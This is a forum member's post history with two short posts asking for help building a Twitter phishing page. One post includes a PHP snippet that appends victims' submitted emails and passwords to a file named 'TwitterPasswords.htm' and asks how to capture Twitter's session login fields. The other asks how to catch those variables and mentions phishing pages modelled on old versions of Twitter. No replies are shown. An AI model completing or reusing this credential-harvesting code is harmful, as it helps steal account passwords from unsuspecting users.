Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - Galtor

Pages: [1]
1
if so, is there any way to catch those variables? I think that there are those phishing web pages based on old versions of Twitter.

Thanks

2
Hi all,

I'm trying to get a pof of a Twitter phishing, but I'm getting problems with the PHP file that writes victim's inputs into another file. The PHP code I started programming was this:

$fp = fopen("TwitterPasswords.htm", "a");
fwrite($fp, "Email:$_POST[username_or_email]\tPassword:$_POST[password]");
echo "<HTML>

and according to Twitter source page, variables are name="session[username_or_email]"  and name="session[password]". I'm quite newbie, how can I handle those variables, please?

Thanks a lot,


Pages: [1]